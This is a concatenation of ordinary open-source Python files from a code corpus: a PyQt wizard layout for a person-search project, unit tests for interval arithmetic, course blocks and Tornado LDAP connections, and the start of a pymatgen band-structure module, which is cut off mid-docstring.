sizePolicy.setHeightForWidth(self.personProjectSearchForDetailsLabel.sizePolicy().hasHeightForWidth())
self.personProjectSearchForDetailsLabel.setSizePolicy(sizePolicy)
self.personProjectSearchForDetailsLabel.setObjectName(_fromUtf8("personProjectSearchForDetailsLabel"))
self.gridLayout.addWidget(self.personProjectSearchForDetailsLabel, 0, 3, 1, 1)
self.personProjectAvailablePluginsScrollArea = QtGui.QScrollArea(self.personProjectWizardPage2)
self.personProjectAvailablePluginsScrollArea.setWidgetResizable(True)
self.personProjectAvailablePluginsScrollArea.setObjectName(_fromUtf8("personProjectAvailablePluginsScrollArea"))
self.scrollAreaWidgetContents = QtGui.QWidget()
self.scrollAreaWidgetContents.setGeometry(QtCore.QRect(0, 0, 98, 91))
self.scrollAreaWidgetContents.setObjectName(_fromUtf8("scrollAreaWidgetContents"))
self.verticalLayout = QtGui.QVBoxLayout(self.scrollAreaWidgetContents)
self.verticalLayout.setObjectName(_fromUtf8("verticalLayout"))
self.personProjectAvailablePluginsListView = QtGui.QListView(self.scrollAreaWidgetContents)
self.personProjectAvailablePluginsListView.setObjectName(_fromUtf8("personProjectAvailablePluginsListView"))
self.verticalLayout.addWidget(self.personProjectAvailablePluginsListView)
self.personProjectAvailablePluginsScrollArea.setWidget(self.scrollAreaWidgetContents)
self.gridLayout.addWidget(self.personProjectAvailablePluginsScrollArea, 1, 2, 1, 2)
self.personProjectSearchForValue = QtGui.QLineEdit(self.personProjectWizardPage2)
self.personProjectSearchForValue.setObjectName(_fromUtf8("personProjectSearchForValue"))
self.gridLayout.addWidget(self.personProjectSearchForValue, 0, 2, 1, 1)
self.horizontalLayout_2 = QtGui.QHBoxLayout()
self.horizontalLayout_2.setObjectName(_fromUtf8("horizontalLayout_2"))
spacerItem3 = QtGui.QSpacerItem(40, 20, QtGui.QSizePolicy.Expanding, QtGui.QSizePolicy.Minimum)
self.horizontalLayout_2.addItem(spacerItem3)
self.personProjectSearchButton = QtGui.QPushButton(self.personProjectWizardPage2)
self.personProjectSearchButton.setDefault(True)
self.personProjectSearchButton.setObjectName(_fromUtf8("personProjectSearchButton"))
self.horizontalLayout_2.addWidget(self.personProjectSearchButton)
self.gridLayout.addLayout(self.horizontalLayout_2, 3, 3, 1, 1)
spacerItem4 = QtGui.QSpacerItem(40, 20, QtGui.QSizePolicy.Expanding, QtGui.QSizePolicy.Minimum)
self.gridLayout.addItem(spacerItem4, 5, 2, 1, 1)
spacerItem5 = QtGui.QSpacerItem(40, 20, QtGui.QSizePolicy.Expanding, QtGui.QSizePolicy.Minimum)
self.gridLayout.addItem(spacerItem5, 9, 2, 1, 1)
self.horizontalLayout_3 = QtGui.QHBoxLayout()
self.horizontalLayout_3.setObjectName(_fromUtf8("horizontalLayout_3"))
spacerItem6 = QtGui.QSpacerItem(40, 20, QtGui.QSizePolicy.Expanding, QtGui.QSizePolicy.Minimum)
self.horizontalLayout_3.addItem(spacerItem6)
self.btnRemoveTarget = QtGui.QPushButton(self.personProjectWizardPage2)
self.btnRemoveTarget.setFocusPolicy(QtCore.Qt.NoFocus)
self.btnRemoveTarget.setStyleSheet(_fromUtf8(""))
self.btnRemoveTarget.setObjectName(_fromUtf8("btnRemoveTarget"))
self.horizontalLayout_3.addWidget(self.btnRemoveTarget)
self.gridLayout.addLayout(self.horizontalLayout_3, 9, 3, 1, 1)
personProjectWizard.addPage(self.personProjectWizardPage2)
self.personProjectWizardPage3 = QtGui.QWizardPage()
self.personProjectWizardPage3.setObjectName(_fromUtf8("personProjectWizardPage3"))
self.personProjectWizardSearchConfigPluginsList = QtGui.QListView(self.personProjectWizardPage3)
self.personProjectWizardSearchConfigPluginsList.setGeometry(QtCore.QRect(0, 0, 256, 531))
self.personProjectWizardSearchConfigPluginsList.setObjectName(_fromUtf8("personProjectWizardSearchConfigPluginsList"))
self.searchConfiguration = QtGui.QStackedWidget(self.personProjectWizardPage3)
self.searchConfiguration.setGeometry(QtCore.QRect(260, 0, 591, 531))
self.searchConfiguration.setObjectName(_fromUtf8("searchConfiguration"))
personProjectWizard.addPage(self.personProjectWizardPage3)
self.personProjectWizardPage4 = QtGui.QWizardPage()
self.personProjectWizardPage4.setObjectName(_fromUtf8("personProjectWizardPage4"))
self.gridLayout_2 = QtGui.QGridLayout(self.personProjectWizardPage4)
self.gridLayout_2.setObjectName(_fromUtf8("gridLayout_2"))
personProjectWizard.addPage(self.personProjectWizardPage4)
self.retranslateUi(personProjectWizard)
QtCore.QMetaObject.connectSlotsByName(personProjectWizard)
def retranslateUi(self, personProjectWizard):
personProjectWizard.setWindowTitle(QtGui.QApplication.translate("personProjectWizard", "New Person Project", None, QtGui.QApplication.UnicodeUTF8))
self.personProjectWizardPage1.setTitle(QtGui.QApplication.translate("personProjectWizard", "Step 1 - Set Project Metadata", None, QtGui.QApplication.UnicodeUTF8))
self.personProjectWizardPage1.setSubTitle(QtGui.QApplication.translate("personProjectWizard", "Add project related information", None, QtGui.QApplication.UnicodeUTF8))
self.personProjectNameValue.setPlaceholderText(QtGui.QApplication.translate("personProjectWizard", "Add a name for your project", None, QtGui.QApplication.UnicodeUTF8))
self.personProjectNameLabel.setText(QtGui.QApplication.translate("personProjectWizard", "Project Name ", None, QtGui.QApplication.UnicodeUTF8))
self.personProjectKeywordsValue.setPlaceholderText(QtGui.QApplication.translate("personProjectWizard", "Add comma seperated keywords for your project", None, QtGui.QApplication.UnicodeUTF8))
self.personProjectDescriptionLabel.setText(QtGui.QApplication.translate("personProjectWizard", "Description", None, QtGui.QApplication.UnicodeUTF8))
self.personProkectKeywordsLabel.setText(QtGui.QApplication.translate("personProjectWizard", "Keywords", None, QtGui.QApplication.UnicodeUTF8))
self.personProjectWizardPage2.setTitle(QtGui.QApplication.translate("personProjectWizard", "Step 2 - Set the target", None, QtGui.QApplication.UnicodeUTF8))
self.personProjectWizardPage2.setSubTitle(QtGui.QApplication.translate("personProjectWizard", "Search for the person you want to track using the available plugins and add it to the <font color=\"red\">selected targets</font> by drag and drop or by clicking \"Add To Targets\"", None, QtGui.QApplication.UnicodeUTF8))
self.btnAddTarget.setText(QtGui.QApplication.translate("personProjectWizard", "Add To Targets", None, QtGui.QApplication.UnicodeUTF8))
self.personProjectSearchForLabel.setText(QtGui.QApplication.translate("personProjectWizard", "<html><head/><body><p><span style=\" font-weight:600;\">Search for</span></p></body></html>", None, QtGui.QApplication.UnicodeUTF8))
self.personProjectSearchResultsLabel.setText(QtGui.QApplication.translate("personProjectWizard", "<html><head/><body><p><span style=\" font-weight:600;\">Search Results </span></p></body></html>", None, QtGui.QApplication.UnicodeUTF8))
self.personProjectSelectedTargetsLabel.setText(QtGui.QApplication.translate("personProjectWizard", "<html><head/><body><p><span style=\" font-weight:600; color:#ff0000;\">Selected Targets</span></p></body></html>", None, QtGui.QApplication.UnicodeUTF8))
self.personProjectSearchInLabel.setText(QtGui.QApplication.translate("personProjectWizard", "<html><head/><body><p><span style=\" font-weight:600;\">Search In</span></p></body></html>", None, QtGui.QApplication.UnicodeUTF8))
self.personProjectSearchForDetailsLabel.setText(QtGui.QApplication.translate("personProjectWizard", "Search by username, mail, full name, id", None, QtGui.QApplication.UnicodeUTF8))
self.personProjectSearchButton.setToolTip(QtGui.QApplication.translate("personProjectWizard", "Search for targets in the selected plugins", None, QtGui.QApplication.UnicodeUTF8))
self.personProjectSearchButton.setText(QtGui.QApplication.translate("personProjectWizard", "Search", None, QtGui.QApplication.UnicodeUTF8))
self.btnRemoveTarget.setText(QtGui.QApplication.translate("personProjectWizard", "Remove Selected", None, QtGui.QApplication.UnicodeUTF8))
self.personProjectWizardPage3.setTitle(QtGui.QApplication.translate("personProjectWizard", "Step 3 - Set Parameters", None, QtGui.QApplication.UnicodeUTF8))
self.personProjectWizardPage3.setSubTitle(QtGui.QApplication.translate("personProjectWizard", "Provide the necessary search parameters for the plugins you are using", None, QtGui.QApplication.UnicodeUTF8))
self.personProjectWizardPage4.setTitle(QtGui.QApplication.translate("personProjectWizard", "Step 4 - Finalize Project", None, QtGui.QApplication.UnicodeUTF8))
self.personProjectWizardPage4.setSubTitle(QtGui.QApplication.translate("personProjectWizard", "Click Finish to save the Project Configuration ", None, QtGui.QApplication.UnicodeUTF8))
import creepy_resources_rc
if __name__ == "__main__":
import sys
app = QtGui.QApplication(sys.argv)
personProjectWizard = QtGui.QWizard()
ui = Ui_personProjectWizard()
ui.setupUi(personProjectWizard)
personProjectWizard.show()
sys.exit(app.exec_())
| gpl-3.0 | 22,272,355,462,730,944 | 82.417778 | 324 | 0.779424 | false |
martinghunt/Fastaq | pyfastaq/tests/intervals_test.py | 2 | 9339 | #!/usr/bin/env python3
import unittest
from pyfastaq import intervals
class TestIntervals(unittest.TestCase):
def test_init(self):
'''Throw error if try to construct genome_interval from a non-int, or end<start'''
with self.assertRaises(intervals.Error):
intervals.Interval('a', 1)
with self.assertRaises(intervals.Error):
intervals.Interval(1, 'a')
with self.assertRaises(intervals.Error):
intervals.Interval('a', 'a')
with self.assertRaises(intervals.Error):
intervals.Interval(3, 2)
def test_comparisons(self):
'''<, <=, == should work as expected'''
self.assertTrue(intervals.Interval(1,2) < intervals.Interval(2,2))
self.assertTrue(intervals.Interval(1,2) <= intervals.Interval(2,2))
self.assertFalse(intervals.Interval(2,2) <= intervals.Interval(1,2))
self.assertFalse(intervals.Interval(2,2) < intervals.Interval(1,2))
self.assertFalse(intervals.Interval(2,2) < intervals.Interval(2,2))
self.assertTrue(intervals.Interval(1,2) == intervals.Interval(1,2))
self.assertFalse(intervals.Interval(1,2) == intervals.Interval(1,3))
self.assertTrue(intervals.Interval(1,2) != intervals.Interval(1,3))
self.assertFalse(intervals.Interval(1,2) != intervals.Interval(1,2))
def test_len(self):
self.assertEqual(len(intervals.Interval(1,2)), 2)
self.assertEqual(len(intervals.Interval(1,1)), 1)
self.assertEqual(len(intervals.Interval(10,20)), 11)
def test_distance_to_point(self):
'''Test distance_to_point'''
self.assertEqual(0, intervals.Interval(42, 50).distance_to_point(42))
self.assertEqual(0, intervals.Interval(42, 50).distance_to_point(44))
self.assertEqual(0, intervals.Interval(42, 50).distance_to_point(50))
self.assertEqual(1, intervals.Interval(42, 50).distance_to_point(41))
self.assertEqual(1, intervals.Interval(42, 50).distance_to_point(51))
self.assertEqual(5, intervals.Interval(42, 50).distance_to_point(55))
self.assertEqual(5, intervals.Interval(42, 50).distance_to_point(37))
def test_intersects(self):
'''Intersection of two intervals should do the right thing'''
a = intervals.Interval(5, 10)
no_intersect = [intervals.Interval(3, 4),
intervals.Interval(11,20)]
intersect = [intervals.Interval(3,5),
intervals.Interval(3,6),
intervals.Interval(9,12),
intervals.Interval(10,12),
intervals.Interval(6,7),
intervals.Interval(1,20)]
for i in no_intersect:
self.assertFalse(a.intersects(i), 'shouldn\'t intersect: ' + str(a) + ', ' + str(i))
for i in intersect:
self.assertTrue(a.intersects(i), 'should intersect: ' + str(a) + ', ' + str(i))
def test_contains(self):
'''Check that contains() works as expected'''
a = intervals.Interval(5, 10)
not_contained = [intervals.Interval(1,2),
intervals.Interval(4,5),
intervals.Interval(4,10),
intervals.Interval(4,11),
intervals.Interval(5,11),
intervals.Interval(1,2),
intervals.Interval(9,11),
intervals.Interval(10,11),
intervals.Interval(11,20)]
contained = [intervals.Interval(5,5),
intervals.Interval(5,10),
intervals.Interval(6,7),
intervals.Interval(6,10),
intervals.Interval(10,10)]
for i in not_contained:
self.assertFalse(a.contains(i), 'shouldn\'t contain: ' + str(a) + ', ' + str(i))
for i in contained:
self.assertTrue(a.contains(i), 'should contain: ' + str(a) + ', ' + str(i))
def test_union(self):
'''Union should either return None or the correct union'''
a = intervals.Interval(5, 10)
b = intervals.Interval(8, 15)
c = intervals.Interval(12, 20)
d = intervals.Interval(21,22)
self.assertEqual(a.union(c), None)
self.assertEqual(c.union(a), None)
self.assertEqual(a.union(b), intervals.Interval(5,15))
self.assertEqual(b.union(a), intervals.Interval(5,15))
self.assertEqual(c.union(d), intervals.Interval(12,22))
self.assertEqual(d.union(c), intervals.Interval(12,22))
def test_union_flll_gap(self):
'''union_fill_gap() should ignore intersections and return the maximum range of coords'''
a = intervals.Interval(5, 10)
b = intervals.Interval(8, 15)
c = intervals.Interval(12, 20)
d = intervals.Interval(21,22)
self.assertEqual(a.union_fill_gap(c), intervals.Interval(5,20))
self.assertEqual(c.union_fill_gap(a), intervals.Interval(5,20))
self.assertEqual(a.union_fill_gap(b), intervals.Interval(5,15))
self.assertEqual(b.union_fill_gap(a), intervals.Interval(5,15))
self.assertEqual(c.union_fill_gap(d), intervals.Interval(12,22))
self.assertEqual(d.union_fill_gap(c), intervals.Interval(12,22))
def test_intersection(self):
'''Intersection should either return None or the correct intersection'''
a = intervals.Interval(5, 10)
b = intervals.Interval(8, 15)
c = intervals.Interval(12, 20)
self.assertEqual(a.intersection(c), None)
self.assertEqual(a.intersection(b), intervals.Interval(8,10))
class Test_intersection(unittest.TestCase):
def test_intersection(self):
'''intersection() should correctly intersect two lists of intervals'''
a = [intervals.Interval(1,2),
intervals.Interval(10,20),
intervals.Interval(51,52),
intervals.Interval(54,55),
intervals.Interval(57,58)]
b = [intervals.Interval(5,6),
intervals.Interval(9,11),
intervals.Interval(13,14),
intervals.Interval(17,18),
intervals.Interval(20,25),
intervals.Interval(50,60)]
c = [intervals.Interval(100,200)]
i = [intervals.Interval(10,11),
intervals.Interval(13,14),
intervals.Interval(17,18),
intervals.Interval(20,20),
intervals.Interval(51,52),
intervals.Interval(54,55),
intervals.Interval(57,58)]
self.assertSequenceEqual(intervals.intersection(a,b), i)
self.assertSequenceEqual(intervals.intersection(b,a), i)
self.assertSequenceEqual(intervals.intersection(c,a), [])
self.assertEqual(intervals.intersection([],a), [])
self.assertEqual(intervals.intersection(a,[]), [])
class Test_merge_overlapping_in_list(unittest.TestCase):
def test_merge_overlapping_in_list(self):
'''merge_overlapping_in_list() merges correctly'''
a = [intervals.Interval(1,2),
intervals.Interval(51,60),
intervals.Interval(10,20),
intervals.Interval(20,30),
intervals.Interval(20,30),
intervals.Interval(29,50),
intervals.Interval(65,70)]
b = [intervals.Interval(1,2),
intervals.Interval(10,60),
intervals.Interval(65,70)]
intervals.merge_overlapping_in_list(a)
self.assertSequenceEqual(a, b)
class Test_remove_contained_in_list(unittest.TestCase):
def test_remove_contained_in_list(self):
'''test_remove_contained_in_list removes the right elements of list'''
a = [intervals.Interval(1,2),
intervals.Interval(4,4),
intervals.Interval(4,5),
intervals.Interval(5,6),
intervals.Interval(7,9),
intervals.Interval(8,10),
intervals.Interval(9,11),
intervals.Interval(20,25),
intervals.Interval(20,24),
intervals.Interval(20,26),
intervals.Interval(30,38),
intervals.Interval(30,37),
intervals.Interval(30,36),
intervals.Interval(30,35),
intervals.Interval(30,35),
intervals.Interval(32,33),
intervals.Interval(38,50),
intervals.Interval(65,70),
intervals.Interval(67,70)]
b = [intervals.Interval(1,2),
intervals.Interval(4,5),
intervals.Interval(5,6),
intervals.Interval(7,9),
intervals.Interval(8,10),
intervals.Interval(9,11),
intervals.Interval(20,26),
intervals.Interval(30,38),
intervals.Interval(38,50),
intervals.Interval(65,70)]
intervals.remove_contained_in_list(a)
self.assertSequenceEqual(a, b)
class Test_length_sum_from_list(unittest.TestCase):
def test_length_sum_from_list(self):
'''Test that total length of intervals is summed correctly'''
a = [intervals.Interval(1,2),
intervals.Interval(4,5),
intervals.Interval(10,19)]
self.assertEqual(14, intervals.length_sum_from_list(a))
if __name__ == '__main__':
unittest.main()
| gpl-3.0 | 6,391,297,924,381,389,000 | 41.067568 | 97 | 0.593747 | false |
wattlebird/pystruct | pystruct/tests/test_learners/test_primal_dual.py | 5 | 1151 | #from crf import BinaryGridCRF
#from structured_svm import NSlackSSVM, SubgradientSSVM
#from structured_svm import objective_primal, PrimalDSStructuredSVM
#from toy_datasets import binary
#def test_primal_dual_binary():
#for C in [1, 100, 100000]:
#for dataset in binary:
#X, Y = dataset(n_samples=1)
#crf = BinaryGridCRF()
#clf = NSlackSSVM(model=crf, max_iter=200, C=C,
#check_constraints=True)
#clf.fit(X, Y)
#clf2 = SubgradientSSVM(model=crf, max_iter=200, C=C)
#clf2.fit(X, Y)
#clf3 = PrimalDSStructuredSVM(model=crf, max_iter=200, C=C)
#clf3.fit(X, Y)
#obj = objective_primal(crf, clf.w, X, Y, C)
## the dual finds the optimum so it might be better
#obj2 = objective_primal(crf, clf2.w, X, Y, C)
#obj3 = objective_primal(crf, clf3.w, X, Y, C)
#assert(obj <= obj2)
#assert(obj <= obj3)
#print("objective difference: %f\n" % (obj2 - obj))
#print("objective difference DS: %f\n" % (obj3 - obj))
#test_primal_dual_binary()
| bsd-2-clause | -4,332,070,732,081,085,400 | 41.62963 | 71 | 0.56907 | false |
solashirai/edx-platform | lms/djangoapps/course_blocks/tests/test_signals.py | 9 | 2116 | """
Unit tests for the Course Blocks signals
"""
from xmodule.modulestore.exceptions import ItemNotFoundError
from xmodule.modulestore.tests.django_utils import ModuleStoreTestCase
from xmodule.modulestore.tests.factories import CourseFactory
from ..api import get_course_blocks, _get_block_structure_manager
from ..transformers.visibility import VisibilityTransformer
from .helpers import is_course_in_block_structure_cache, EnableTransformerRegistryMixin
class CourseBlocksSignalTest(EnableTransformerRegistryMixin, ModuleStoreTestCase):
"""
Tests for the Course Blocks signal
"""
def setUp(self):
super(CourseBlocksSignalTest, self).setUp(create_user=True)
self.course = CourseFactory.create()
self.course_usage_key = self.store.make_course_usage_key(self.course.id)
def test_course_publish(self):
# course is not visible to staff only
self.assertFalse(self.course.visible_to_staff_only)
orig_block_structure = get_course_blocks(self.user, self.course_usage_key)
self.assertFalse(
VisibilityTransformer.get_visible_to_staff_only(orig_block_structure, self.course_usage_key)
)
# course becomes visible to staff only
self.course.visible_to_staff_only = True
self.store.update_item(self.course, self.user.id)
updated_block_structure = get_course_blocks(self.user, self.course_usage_key)
self.assertTrue(
VisibilityTransformer.get_visible_to_staff_only(updated_block_structure, self.course_usage_key)
)
def test_course_delete(self):
get_course_blocks(self.user, self.course_usage_key)
bs_manager = _get_block_structure_manager(self.course.id)
self.assertIsNotNone(bs_manager.get_collected())
self.assertTrue(is_course_in_block_structure_cache(self.course.id, self.store))
self.store.delete_course(self.course.id, self.user.id)
with self.assertRaises(ItemNotFoundError):
bs_manager.get_collected()
self.assertFalse(is_course_in_block_structure_cache(self.course.id, self.store))
| agpl-3.0 | 445,194,021,282,653,900 | 40.490196 | 107 | 0.721645 | false |
Noirello/PyLDAP | tests/test_tornado.py | 1 | 7802 | import unittest
import sys
import pytest
from conftest import get_config, network_delay
from bonsai import LDAPClient
from bonsai import LDAPEntry
import bonsai.errors
def dummy(timeout=None):
def dummy_f(f):
return f
return dummy_f
try:
from tornado import gen
from tornado.testing import gen_test
from tornado.testing import AsyncTestCase
from bonsai.tornado import TornadoLDAPConnection
TestCaseClass = AsyncTestCase
MOD_INSTALLED = True
except ImportError:
TestCaseClass = unittest.TestCase
gen_test = dummy
MOD_INSTALLED = False
@pytest.mark.skipif(not MOD_INSTALLED, reason="Tornado is not installed.")
class TornadoLDAPConnectionTest(TestCaseClass):
""" Test TornadoLDAPConnection object. """
def setUp(self):
""" Set LDAP URL and open connection. """
self.cfg = get_config()
self.url = "ldap://%s:%s/%s?%s?%s" % (
self.cfg["SERVER"]["hostip"],
self.cfg["SERVER"]["port"],
self.cfg["SERVER"]["basedn"],
self.cfg["SERVER"]["search_attr"],
self.cfg["SERVER"]["search_scope"],
)
self.basedn = self.cfg["SERVER"]["basedn"]
self.ipaddr = self.cfg["SERVER"]["hostip"]
self.client = LDAPClient(self.url)
self.client.set_credentials(
"SIMPLE",
user=self.cfg["SIMPLEAUTH"]["user"],
password=self.cfg["SIMPLEAUTH"]["password"],
)
self.client.set_async_connection_class(TornadoLDAPConnection)
self.io_loop = self.get_new_ioloop()
@gen_test(timeout=20.0)
def test_connection(self):
""" Test opening a connection. """
conn = yield self.client.connect(True, ioloop=self.io_loop)
assert conn is not None
assert not conn.closed
conn.close()
@gen_test(timeout=20.0)
def test_search(self):
""" Test search. """
with (yield self.client.connect(True, ioloop=self.io_loop)) as conn:
res = yield conn.search()
assert res is not None
@gen_test(timeout=20.0)
def test_add_and_delete(self):
""" Test addding and deleting an LDAP entry. """
with (yield self.client.connect(True, ioloop=self.io_loop)) as conn:
entry = LDAPEntry("cn=async_test,%s" % self.basedn)
entry["objectclass"] = [
"top",
"inetOrgPerson",
"person",
"organizationalPerson",
]
entry["sn"] = "async_test"
try:
yield conn.add(entry)
except bonsai.errors.AlreadyExists:
yield conn.delete(entry.dn)
yield conn.add(entry)
except:
self.fail("Unexpected error.")
res = yield conn.search()
assert entry in res
yield entry.delete()
res = yield conn.search()
assert entry not in res
@gen_test(timeout=20.0)
def test_recursive_delete(self):
""" Test removing a subtree recursively. """
org1 = bonsai.LDAPEntry("ou=testusers,%s" % self.basedn)
org1.update({"objectclass": ["organizationalUnit", "top"], "ou": "testusers"})
org2 = bonsai.LDAPEntry("ou=tops,ou=testusers,%s" % self.basedn)
org2.update({"objectclass": ["organizationalUnit", "top"], "ou": "tops"})
entry = bonsai.LDAPEntry("cn=tester,ou=tops,ou=testusers,%s" % self.basedn)
entry.update(
{"objectclass": ["top", "inetorgperson"], "cn": "tester", "sn": "example"}
)
try:
with (
yield self.client.connect(True, timeout=10.0, ioloop=self.io_loop)
) as conn:
yield conn.add(org1)
yield conn.add(org2)
yield conn.add(entry)
with pytest.raises(bonsai.errors.NotAllowedOnNonleaf):
yield conn.delete(org1.dn)
yield conn.delete(org1.dn, recursive=True)
res = yield conn.search(org1.dn, 2)
assert res == []
except bonsai.LDAPError as err:
self.fail("Recursive delete is failed: %s" % err)
@gen_test(timeout=20.0)
def test_modify_and_rename(self):
""" Test modifying and renaming an LDAP entry. """
with (yield self.client.connect(True, ioloop=self.io_loop)) as conn:
entry = LDAPEntry("cn=async_test,%s" % self.basedn)
entry["objectclass"] = [
"top",
"inetOrgPerson",
"person",
"organizationalPerson",
]
entry["sn"] = "async_test"
oldname = "cn=async_test,%s" % self.basedn
newname = "cn=async_test2,%s" % self.basedn
res = yield conn.search(newname, 0)
if res:
yield res[0].delete()
try:
yield conn.add(entry)
except bonsai.errors.AlreadyExists:
yield conn.delete(entry.dn)
yield conn.add(entry)
except:
self.fail("Unexpected error.")
entry["sn"] = "async_test2"
yield entry.modify()
yield entry.rename(newname)
res = yield conn.search(entry.dn, 0, attrlist=["sn"])
assert entry["sn"] == res[0]["sn"]
res = yield conn.search(oldname, 0)
assert res == []
yield conn.delete(entry.dn)
@gen_test(timeout=20.0)
def test_obj_err(self):
""" Test object class violation error. """
entry = LDAPEntry("cn=async_test,%s" % self.basedn)
entry["cn"] = ["async_test"]
with (yield self.client.connect(True, ioloop=self.io_loop)) as conn:
with pytest.raises(bonsai.errors.ObjectClassViolation):
yield conn.add(entry)
@gen_test(timeout=20.0)
def test_whoami(self):
""" Test whoami. """
with (yield self.client.connect(True, ioloop=self.io_loop)) as conn:
obj = yield conn.whoami()
expected_res = [
"dn:%s" % self.cfg["SIMPLEAUTH"]["user"],
self.cfg["SIMPLEAUTH"]["adusername"],
]
assert obj in expected_res
@gen_test(timeout=12.0)
def test_connection_timeout(self):
""" Test connection timeout. """
with network_delay(7.0):
with pytest.raises(gen.TimeoutError):
yield self.client.connect(True, ioloop=self.io_loop, timeout=8.0)
@gen_test(timeout=18.0)
def test_search_timeout(self):
""" Test search timeout. """
with (yield self.client.connect(True, ioloop=self.io_loop)) as conn:
with network_delay(7.0):
with pytest.raises(gen.TimeoutError):
yield conn.search(timeout=3.0)
@pytest.mark.skipif(
sys.version_info.minor < 5,
reason="No __aiter__ and __anext__ methods under 3.5.",
)
@gen_test(timeout=20.0)
def test_paged_search(self):
""" Test paged search. """
search_dn = "ou=nerdherd,%s" % self.basedn
with (yield self.client.connect(True, ioloop=self.io_loop)) as conn:
# To keep compatibility with 3.4 it does not uses async for,
# but its while loop equivalent.
res_iter = yield conn.paged_search(search_dn, 1, page_size=3)
res_iter = type(res_iter).__aiter__(res_iter)
cnt = 0
while True:
try:
res = yield type(res_iter).__anext__(res_iter)
assert isinstance(res, LDAPEntry)
cnt += 1
except StopAsyncIteration:
break
assert cnt == 6
| mit | 865,521,617,047,090,800 | 35.629108 | 86 | 0.550244 | false |
montoyjh/pymatgen | pymatgen/electronic_structure/bandstructure.py | 1 | 41712 | # coding: utf-8
# Copyright (c) Pymatgen Development Team.
# Distributed under the terms of the MIT License.
import numpy as np
import math
import itertools
import collections
import warnings
from monty.json import MSONable
from pymatgen.core.periodic_table import get_el_sp
from pymatgen.core.structure import Structure
from pymatgen.core.lattice import Lattice
from pymatgen.electronic_structure.core import Spin, Orbital
from pymatgen.symmetry.analyzer import SpacegroupAnalyzer
from pymatgen.util.coord import pbc_diff
"""
This module provides classes to define everything related to band structures.
"""
__author__ = "Geoffroy Hautier, Shyue Ping Ong, Michael Kocher"
__copyright__ = "Copyright 2012, The Materials Project"
__version__ = "1.0"
__maintainer__ = "Geoffroy Hautier"
__email__ = "[email protected]"
__status__ = "Development"
__date__ = "March 14, 2012"
class Kpoint(MSONable):
"""
Class to store kpoint objects. A kpoint is defined with a lattice and frac
or cartesian coordinates syntax similar than the site object in
pymatgen.core.structure.
Args:
coords: coordinate of the kpoint as a numpy array
lattice: A pymatgen.core.lattice.Lattice lattice object representing
the reciprocal lattice of the kpoint
to_unit_cell: Translates fractional coordinate to the basic unit
cell, i.e., all fractional coordinates satisfy 0 <= a < 1.
Defaults to False.
coords_are_cartesian: Boolean indicating if the coordinates given are
in cartesian or fractional coordinates (by default fractional)
label: the label of the kpoint if any (None by default)
"""
def __init__(self, coords, lattice, to_unit_cell=False,
coords_are_cartesian=False, label=None):
self._lattice = lattice
self._fcoords = lattice.get_fractional_coords(coords) \
if coords_are_cartesian else coords
self._label = label
if to_unit_cell:
for i in range(len(self._fcoords)):
self._fcoords[i] -= math.floor(self._fcoords[i])
self._ccoords = lattice.get_cartesian_coords(self._fcoords)
@property
def lattice(self):
"""
The lattice associated with the kpoint. It's a
pymatgen.core.lattice.Lattice object
"""
return self._lattice
@property
def label(self):
"""
The label associated with the kpoint
"""
return self._label
@property
def frac_coords(self):
"""
The fractional coordinates of the kpoint as a numpy array
"""
return np.copy(self._fcoords)
@property
def cart_coords(self):
"""
The cartesian coordinates of the kpoint as a numpy array
"""
return np.copy(self._ccoords)
@property
def a(self):
"""
Fractional a coordinate of the kpoint
"""
return self._fcoords[0]
@property
def b(self):
"""
Fractional b coordinate of the kpoint
"""
return self._fcoords[1]
@property
def c(self):
"""
Fractional c coordinate of the kpoint
"""
return self._fcoords[2]
def __str__(self):
"""
Returns a string with fractional, cartesian coordinates and label
"""
return "{} {} {}".format(self.frac_coords, self.cart_coords,
self.label)
def as_dict(self):
"""
Json-serializable dict representation of a kpoint
"""
return {"lattice": self.lattice.as_dict(),
"fcoords": list(self.frac_coords),
"ccoords": list(self.cart_coords), "label": self.label,
"@module": self.__class__.__module__,
"@class": self.__class__.__name__}
class BandStructure:
"""
This is the most generic band structure data possible
it's defined by a list of kpoints + energies for each of them
.. attribute:: kpoints:
the list of kpoints (as Kpoint objects) in the band structure
.. attribute:: lattice_rec
the reciprocal lattice of the band structure.
.. attribute:: efermi
the fermi energy
.. attribute:: is_spin_polarized
True if the band structure is spin-polarized, False otherwise
.. attribute:: bands
The energy eigenvalues as a {spin: ndarray}. Note that the use of an
ndarray is necessary for computational as well as memory efficiency
due to the large amount of numerical data. The indices of the ndarray
are [band_index, kpoint_index].
.. attribute:: nb_bands
returns the number of bands in the band structure
.. attribute:: structure
returns the structure
.. attribute:: projections
The projections as a {spin: ndarray}. Note that the use of an
ndarray is necessary for computational as well as memory efficiency
due to the large amount of numerical data. The indices of the ndarray
are [band_index, kpoint_index, orbital_index, ion_index].
Args:
kpoints: list of kpoint as numpy arrays, in frac_coords of the
given lattice by default
eigenvals: dict of energies for spin up and spin down
{Spin.up:[][],Spin.down:[][]}, the first index of the array
[][] refers to the band and the second to the index of the
kpoint. The kpoints are ordered according to the order of the
kpoints array. If the band structure is not spin polarized, we
only store one data set under Spin.up
lattice: The reciprocal lattice as a pymatgen Lattice object.
Pymatgen uses the physics convention of reciprocal lattice vectors
WITH a 2*pi coefficient
efermi: fermi energy
labels_dict: (dict) of {} this links a kpoint (in frac coords or
cartesian coordinates depending on the coords) to a label.
coords_are_cartesian: Whether coordinates are cartesian.
structure: The crystal structure (as a pymatgen Structure object)
associated with the band structure. This is needed if we
provide projections to the band structure
projections: dict of orbital projections as {spin: ndarray}. The
indices of the ndarrayare [band_index, kpoint_index, orbital_index,
ion_index].If the band structure is not spin polarized, we only
store one data set under Spin.up.
"""
def __init__(self, kpoints, eigenvals, lattice, efermi, labels_dict=None,
coords_are_cartesian=False, structure=None, projections=None):
self.efermi = efermi
self.lattice_rec = lattice
self.kpoints = []
self.labels_dict = {}
self.structure = structure
self.projections = projections or {}
self.projections = {k: np.array(v) for k, v in self.projections.items()}
if labels_dict is None:
labels_dict = {}
if len(self.projections) != 0 and self.structure is None:
raise Exception("if projections are provided a structure object"
" needs also to be given")
for k in kpoints:
# let see if this kpoint has been assigned a label
label = None
for c in labels_dict:
if np.linalg.norm(k - np.array(labels_dict[c])) < 0.0001:
label = c
self.labels_dict[label] = Kpoint(
k, lattice, label=label,
coords_are_cartesian=coords_are_cartesian)
self.kpoints.append(
Kpoint(k, lattice, label=label,
coords_are_cartesian=coords_are_cartesian))
self.bands = {spin: np.array(v) for spin, v in eigenvals.items()}
self.nb_bands = len(eigenvals[Spin.up])
self.is_spin_polarized = len(self.bands) == 2
def get_projection_on_elements(self):
"""
Method returning a dictionary of projections on elements.
Returns:
